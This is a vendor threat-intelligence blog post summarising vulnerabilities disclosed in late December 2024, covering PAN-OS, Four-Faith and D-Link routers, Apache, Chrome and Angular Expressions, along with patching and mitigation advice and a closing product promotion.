The latest Weekly Vulnerability Report highlights critical flaws found from Dec 25-31, 2024, including risks in Palo Alto, D-Link, and Four-Faith routers, and CISA's KEV updates.

Overview

This week’s vulnerability report sheds light on a broad range of critical vulnerabilities identified from December 25 to December 31, 2024. The report emphasizes several high-severity flaws that pose online threats to cybersecurity, including new additions to the CISA’s Known Exploited Vulnerability (KEV) catalog.

Among the most pressing vulnerabilities, one concerning Palo Alto Networks’ PAN-OS stands out. This vulnerability has been actively exploited by cybercriminals to compromise firewalls, forcing them to reboot and disrupting network security. The Cybersecurity and Infrastructure Security Agency (CISA) added this vulnerability to their KEV catalog, signifying its exploitation in the wild.

Beyond this, CRIL also analyzed multiple high-profile vulnerabilities impacting D-Link products and Four-Faith routers, both of which are integral to various Internet of Things (IoT) applications.

CISA’s KEV Catalog Adds New Vulnerability

This week, CISA’s KEV catalog was updated to include a critical vulnerability in PAN-OS by Palo Alto Networks (CVE-2024-3393). The flaw lies in the handling of malformed DNS packets, which can be leveraged to exploit the firewall systems, ultimately causing service disruptions by forcing them to reboot. Given its active exploitation, CISA has strongly urged organizations using Palo Alto Networks firewalls to apply the necessary patches to safeguard their networks from potential breaches.

In addition, Four-Faith routers (CVE-2024-12856) have also been found vulnerable to OS command injection. These routers are extensively used in IoT environments, where remote attackers can exploit default credentials and send specially crafted HTTP requests. Once successful, attackers can remotely execute arbitrary OS commands, significantly compromising the integrity of the affected systems.

D-Link Vulnerabilities Pose Major Threats

D-Link, a global leader in networking hardware, continues to be the focus of vulnerability research. CRIL identified multiple flaws affecting various D-Link routers, including the DIR-806 (CVE-2019-10891), DIR-645 (CVE-2015-2051), and DIR-845L (CVE-2024-33112), among others. These command injection vulnerabilities allow attackers to execute arbitrary commands on vulnerable devices remotely, facilitating initial access for malware campaigns.

Furthermore, vulnerabilities in D-Link’s GO-RT-AC750 (CVE-2022-37056) and DIR-845L (CVE-2024-33112) routers were found to be exploited by the Ficora and Capsaicin botnets, targeting outdated routers or devices that are no longer supported. These findings emphasize the importance of updating D-Link devices and ensuring that default credentials are changed to prevent attackers from easily gaining access.

New Exploits in Apache Software and Google Products

The Apache Software Foundation has also become a focal point in the latest vulnerability findings. Two critical vulnerabilities were identified in Apache Traffic Control (CVE-2024-45387) and Apache HugeGraph-Server (CVE-2024-43441). The former, an SQL injection vulnerability, allows privileged users to execute arbitrary SQL queries against a backend database. The latter vulnerability, an authentication bypass flaw, affects Apache HugeGraph, an open-source graph database, and could be exploited by attackers to bypass authentication mechanisms.

In the realm of web security, Google Chrome (CVE-2024-9122) and the AngularJS web framework (CVE-2024-54152) also saw severe vulnerabilities this week. The Chrome vulnerability centers around a Type Confusion flaw in the V8 JavaScript engine, enabling attackers to access out-of-bounds memory locations through malicious HTML pages. Meanwhile, AngularJS users are at risk of a code injection flaw in earlier versions of Angular Expressions, which could allow arbitrary code execution on affected systems.

Vulnerability Exploits in Underground Forums

CRIL researchers also monitored underground forums and Telegram channels, where they observed multiple instances of Proof-of-Concept (PoC) exploits being shared. Among the vulnerabilities discussed were CVE-2023-21554, which affected Microsoft MSMQ, and CVE-2024-54152, which affected AngularJS. Threat actors in these forums discussed the active exploitation of these vulnerabilities and shared tools and methods for attacking vulnerable systems.

The Microsoft Message Queuing (MSMQ) service vulnerability (CVE-2023-21554), also known as QueueJumper, is particularly concerning. This remote code execution (RCE) vulnerability can allow attackers to execute arbitrary code on vulnerable servers. A notable trend in underground forums was the high demand for exploits targeting MSMQ servers, with actors willing to purchase exploits for up to USD 1,000.

Similarly, the CVE-2024-9122 vulnerability in Google Chrome was also discussed widely on dark web channels, where exploits for this high-severity flaw were being weaponized to target vulnerable versions of the browser.

Recommendation and Mitigation Strategies

As always, CRIL stresses the importance of prompt patching and network defenses to protect against these cyber threats. Key recommendations include:

1. Ensure that all systems are up to date with the latest patches from official vendors. Timely patching is critical to prevent attackers from exploiting known vulnerabilities.
2. Develop a comprehensive patch management strategy that includes asset tracking, patch assessment, and deployment. Automate the process where feasible to improve efficiency.
3. Implement network segmentation to minimize the exposure of critical systems. Use firewalls, VLANs, and access controls to restrict access to sensitive assets.
4. Enforce strong password policies and implement multi-factor authentication (MFA) to prevent unauthorized access.
5. Use Security Information and Event Management (SIEM) tools to detect suspicious activities in real time and generate alerts for potential exploits.
6. Maintain an updated incident response and recovery plan to ensure quick action in the event of a security breach.
7. Regularly perform vulnerability assessments and penetration tests to identify and mitigate security gaps.
8. Stay updated with the latest vulnerability disclosures and security advisories from trusted sources such as CISA and official vendors.

Conclusion

The latest Weekly Vulnerability Report from Cyble highlights critical security flaws across prominent platforms, such as D-Link, Apache, and Palo Alto. These vulnerabilities present significant risks to organizations worldwide. By leveraging Cyble’s advanced threat intelligence solutions, including proactive AI-powered platforms like Cyble Vision, businesses can better protect themselves from emerging threats, ensuring rapid response and reduced exposure to cyber risks. Stay ahead of cybercriminals with Cyble’s cutting-edge cybersecurity tools and expert guidance.

Related